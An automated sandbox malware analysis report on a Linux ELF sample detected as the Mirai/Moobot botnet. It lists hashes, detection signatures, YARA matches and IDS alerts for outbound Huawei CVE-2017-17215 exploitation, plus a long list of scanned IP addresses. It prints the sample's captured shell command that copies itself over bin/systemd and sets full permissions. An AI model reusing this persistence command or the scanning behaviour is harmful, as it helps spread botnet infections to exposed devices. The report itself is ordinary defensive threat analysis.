Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
8oxYPvmeaT.elf

Overview

General Information

Sample Name:8oxYPvmeaT.elf
Original Sample Name:4b9afff9b19166f6e9ee490e32e0fb15.elf
Analysis ID:830809
MD5:4b9afff9b19166f6e9ee490e32e0fb15
SHA1:31d41fd14ab0b236e2802e774c6f601f329d152e
SHA256:e3fde73a75a23deb0a08b00b153097005ee62bca9969c37755557614efca9f80
Tags:32elfmirairenesas
Infos:

Detection

Mirai, Moobot
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Moobot
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Sets full permissions to files and/or directories
Yara signature match
Executes the "mkdir" command used to create folders
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "chmod" command used to modify permissions
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Sample has stripped symbol table
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

All domains contacted by the sample do not resolve. The sample is likely an old dropper which does no longer work.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Joe Sandbox Version:37.0.0 Beryl
Analysis ID:830809
Start date and time:2023-03-20 17:52:57 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 50s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:8oxYPvmeaT.elf
Original Sample Name:4b9afff9b19166f6e9ee490e32e0fb15.elf
Detection:MAL
Classification:mal92.troj.linELF@0/0@105/0
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
  • VT rate limit hit for: 8oxYPvmeaT.elf
Command:/tmp/8oxYPvmeaT.elf
PID:6231
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
^p
Standard Error:chmod: cannot access ''$'\377\177''bin/systemd'$'\177\030\374\377\177''8'$'\374\377\177''d'$'\374\377\177\230\221''@': No such file or directory
  • system is lnxubuntu20
  • 8oxYPvmeaT.elf (PID: 6231, Parent: 6132, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/8oxYPvmeaT.elf
    • sh (PID: 6233, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/systemd && mkdir bin; >bin/systemd && mv /tmp/8oxYPvmeaT.elf bin/systemd; chmod 777 \\xffbin/systemd\\xfc\\xff8\\xfc\\xffd\\xfc\\xff\\x98\\x91@"
      • sh New Fork (PID: 6235, Parent: 6233)
      • rm (PID: 6235, Parent: 6233, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/systemd
      • sh New Fork (PID: 6236, Parent: 6233)
      • mkdir (PID: 6236, Parent: 6233, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 6237, Parent: 6233)
      • mv (PID: 6237, Parent: 6233, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/8oxYPvmeaT.elf bin/systemd
      • sh New Fork (PID: 6238, Parent: 6233)
      • chmod (PID: 6238, Parent: 6233, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 \\xffbin/systemd\\xfc\\xff8\\xfc\\xffd\\xfc\\xff\\x98\\x91@
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
SourceRuleDescriptionAuthorStrings
8oxYPvmeaT.elfJoeSecurity_MoobotYara detected MoobotJoe Security
    8oxYPvmeaT.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      8oxYPvmeaT.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0xbf60:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xbf74:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xbf88:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xbf9c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xbfb0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xbfc4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xbfd8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xbfec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc000:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc014:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc028:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc03c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc050:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc064:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc078:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc08c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc0a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc0b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc0c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc0dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc0f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      6231.1.00007fa678400000.00007fa67840e000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
        6231.1.00007fa678400000.00007fa67840e000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6231.1.00007fa678400000.00007fa67840e000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0xbf60:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xbf74:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xbf88:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xbf9c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xbfb0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xbfc4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xbfd8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xbfec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc000:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc014:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc028:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc03c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc050:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc064:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc078:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc08c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc0a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc0b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc0c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc0dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc0f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          6241.1.00007fa678400000.00007fa67840e000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
            6241.1.00007fa678400000.00007fa67840e000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              Click to see the 4 entries
              Timestamp:192.168.2.23197.3.233.17434126372152835222 03/20/23-17:55:45.971245
              SID:2835222
              Source Port:34126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23177.177.96.5145106372152835222 03/20/23-17:55:17.129201
              SID:2835222
              Source Port:45106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2341.236.128.17155800372152835222 03/20/23-17:55:01.346736
              SID:2835222
              Source Port:55800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23197.39.127.1246968372152835222 03/20/23-17:55:10.843812
              SID:2835222
              Source Port:46968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2341.236.89.23756078372152835222 03/20/23-17:55:31.621522
              SID:2835222
              Source Port:56078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 8oxYPvmeaT.elfReversingLabs: Detection: 58%

              Networking

              barindex
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55800 -> 41.236.128.171:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46968 -> 197.39.127.12:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45106 -> 177.177.96.51:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56078 -> 41.236.89.237:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34126 -> 197.3.233.174:37215
              Source: global trafficTCP traffic: 197.9.159.121 ports 1,2,3,5,7,37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55800 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 55800
              Source: unknownNetwork traffic detected: HTTP traffic on port 46968 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 46968
              Source: unknownNetwork traffic detected: HTTP traffic on port 45106 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56078 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 56078
              Source: unknownNetwork traffic detected: HTTP traffic on port 34126 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 34126
              Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
              Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
              Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 96.126.75.168:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 135.29.85.160:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.165.157.167:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.218.72.255:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.111.232.41:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 180.215.178.223:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.95.212.145:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.139.208.17:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.166.32.51:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.50.201.94:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 38.214.124.88:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.207.197.234:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 97.188.19.223:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 47.173.204.30:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.111.253.197:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.116.217.181:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.201.40.22:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.156.89.127:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.163.203.95:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 180.16.78.227:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.142.183.154:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.201.23.58:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.124.5.18:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.205.217.145:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.24.45.221:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.145.240.122:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.157.101.174:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.11.97.13:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 109.189.48.21:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.114.172.204:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 201.161.74.244:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.122.69.72:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.123.180.115:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 36.47.88.65:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.128.254.123:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.95.27.19:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.21.137.84:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.82.218.221:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.236.249.120:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.161.177.81:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.236.123.21:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.12.198.165:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.225.81.170:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.94.171.198:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.156.120.144:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 2.45.60.100:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 110.144.113.240:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.108.69.86:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.227.88.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.44.78.95:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.81.48.189:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 40.80.174.74:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 2.111.198.123:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.255.36.90:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.50.101.243:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.123.4.78:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.225.73.200:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 39.191.83.175:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 196.204.13.200:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.188.20.30:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.76.247.141:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.239.100.144:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.164.226.149:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.78.236.201:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.228.175.174:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.82.51.10:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.147.99.205:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.139.143.169:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.65.111.193:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.176.160.201:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.4.101.121:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 9.195.101.185:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.116.244.247:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.92.66.176:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.168.41.162:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 213.30.91.89:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.23.31.235:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 141.244.247.254:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.181.4.135:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.156.112.247:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 42.108.113.215:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.156.200.110:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 132.38.63.3:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.130.226.168:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 63.205.49.94:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.234.30.87:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.134.251.217:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.55.83.14:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.205.159.13:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.124.149.202:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.108.99.38:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 195.100.127.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.53.203.220:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.123.49.231:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 69.85.242.189:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.75.34.149:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.160.89.137:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 70.168.214.134:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 85.49.240.165:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.90.132.67:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.113.7.150:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.225.113.118:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.27.5.155:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.78.76.76:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.230.94.230:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.93.120.67:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 132.196.174.189:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.196.217.234:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 85.241.89.220:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.88.168.153:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.133.203.139:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.14.44.240:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.92.168.148:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.52.109.254:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.90.92.63:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.14.196.242:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.52.82.60:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 120.68.62.41:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.94.19.119:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.155.135.157:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.211.52.194:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.238.143.184:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.47.122.70:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.95.79.156:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.46.68.124:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 69.6.230.128:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.14.133.138:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.97.41.184:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.177.33.244:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.242.21.0:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.70.203.24:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 87.22.92.96:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 93.216.135.162:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.154.181.112:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 153.69.235.1:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 152.7.182.250:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.129.64.67:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.100.239.234:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.189.97.29:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 131.20.232.114:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 146.174.75.54:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.155.23.105:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.52.144.185:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.79.86.99:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.30.23.114:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.89.66.159:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.16.55.186:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.142.105.206:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.155.143.18:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.115.30.137:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.50.122.154:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.145.171.119:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.67.73.77:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.170.177.24:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.80.141.162:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 25.246.72.10:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.162.221.95:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.251.191.22:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.148.112.125:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.35.91.153:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.215.172.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.254.207.55:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.248.114.0:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.131.227.9:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.83.63.252:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 148.103.174.64:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.39.173.123:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.163.71.115:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.114.220.21:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 120.98.90.233:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.152.16.159:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.1.248.98:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.44.214.241:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 64.202.237.42:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.129.235.95:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.85.252.37:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.91.221.132:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.228.14.143:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.212.13.26:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 154.10.194.95:37215
